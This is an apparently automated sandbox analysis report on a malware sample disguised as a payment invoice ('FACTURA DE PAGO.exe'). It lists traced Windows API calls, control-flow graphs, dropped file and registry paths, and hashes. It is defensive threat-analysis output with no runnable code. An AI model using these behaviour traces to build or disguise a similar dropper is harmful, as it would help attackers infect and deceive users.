                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$wsprintf
                                                                                        • String ID: DA$ DA$... %d%%$DwA
                                                                                        • API String ID: 551687249-506594815
                                                                                        • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                        • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                        • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                        • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 755 40540e-405459 CreateDirectoryA 756 40545b-40545d 755->756 757 40545f-40546c GetLastError 755->757 758 405486-405488 756->758 757->758 759 40546e-405482 SetFileSecurityA 757->759 759->756 760 405484 GetLastError 759->760 760->758
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                        • GetLastError.KERNEL32 ref: 00405465
                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                        • GetLastError.KERNEL32 ref: 00405484
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                        • API String ID: 3449924974-3946084282
                                                                                        • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                        • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                        • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                        • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 761 40605a-40607a GetSystemDirectoryA 762 40607c 761->762 763 40607e-406080 761->763 762->763 764 406090-406092 763->764 765 406082-40608a 763->765 767 406093-4060c5 wsprintfA LoadLibraryExA 764->767 765->764 766 40608c-40608e 765->766 766->767
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                        • wsprintfA.USER32 ref: 004060AA
                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-4240819195
                                                                                        • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                        • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                        • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                        • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 768 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 775 4023b0-4023b8 768->775 776 4028cf-4028de 768->776 777 4023c8-4023cb 775->777 778 4023ba-4023c7 call 402a3a lstrlenA 775->778 782 4023db-4023de 777->782 783 4023cd-4023da call 402a1d 777->783 778->777 784 4023e0-4023ea call 402e9f 782->784 785 4023ef-402403 RegSetValueExA 782->785 783->782 784->785 789 402405 785->789 790 402408-4024de RegCloseKey 785->790 789->790 790->776
                                                                                        APIs
                                                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                        • lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                        • String ID: Arabisation\argumenta\dekaderne
                                                                                        • API String ID: 1356686001-2217045471
                                                                                        • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                        • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                        • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                        • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 793 4059d1-4059db 794 4059dc-405a07 GetTickCount GetTempFileNameA 793->794 795 405a16-405a18 794->795 796 405a09-405a0b 794->796 798 405a10-405a13 795->798 796->794 797 405a0d 796->797 797->798
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004059E5
                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                        Strings
                                                                                        • nsa, xrefs: 004059DC
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                        • "C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004059D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-2396142748
                                                                                        • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                        • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                        • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                        • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 799 401bca-401be2 call 402a1d * 2 804 401be4-401beb call 402a3a 799->804 805 401bee-401bf2 799->805 804->805 806 401bf4-401bfb call 402a3a 805->806 807 401bfe-401c04 805->807 806->807 811 401c06-401c1a call 402a1d * 2 807->811 812 401c4a-401c70 call 402a3a * 2 FindWindowExA 807->812 823 401c3a-401c48 SendMessageA 811->823 824 401c1c-401c38 SendMessageTimeoutA 811->824 822 401c76 812->822 825 401c79-401c7c 822->825 823->822 824->825 826 401c82 825->826 827 4028cf-4028de 825->827 826->827
                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                        • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                        • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                        • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 830 401f90-401f9c 831 401fa2-401fb8 call 402a3a * 2 830->831 832 402057-402059 830->832 841 401fc7-401fd5 LoadLibraryExA 831->841 842 401fba-401fc5 GetModuleHandleA 831->842 833 4021c4-4021c9 call 401423 832->833 840 4028cf-4028de 833->840 844 401fd7-401fe4 GetProcAddress 841->844 845 402050-402052 841->845 842->841 842->844 847 402023-402028 call 404f48 844->847 848 401fe6-401fec 844->848 845->833 852 40202d-402030 847->852 850 402005-402021 848->850 851 401fee-401ffa call 401423 848->851 850->852 851->852 861 401ffc-402003 851->861 852->840 854 402036-40203e call 40364f 852->854 854->840 860 402044-40204b FreeLibrary 854->860 860->840 861->852
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                          • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                          • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2987980305-0
                                                                                        • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                        • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                        • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                        • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                        APIs
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                          • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                          • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,000000F0), ref: 00401634
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 00401629
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
                                                                                        • API String ID: 1892508949-4293336683
                                                                                        • Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                        • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                        • Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                        • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                          • Part of subcall function 00403F60: SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 00403F72
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                        • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                        • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                        • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                        • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 004054D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                        • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                        • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                        • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                        APIs
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                          • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                          • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                          • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                          • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
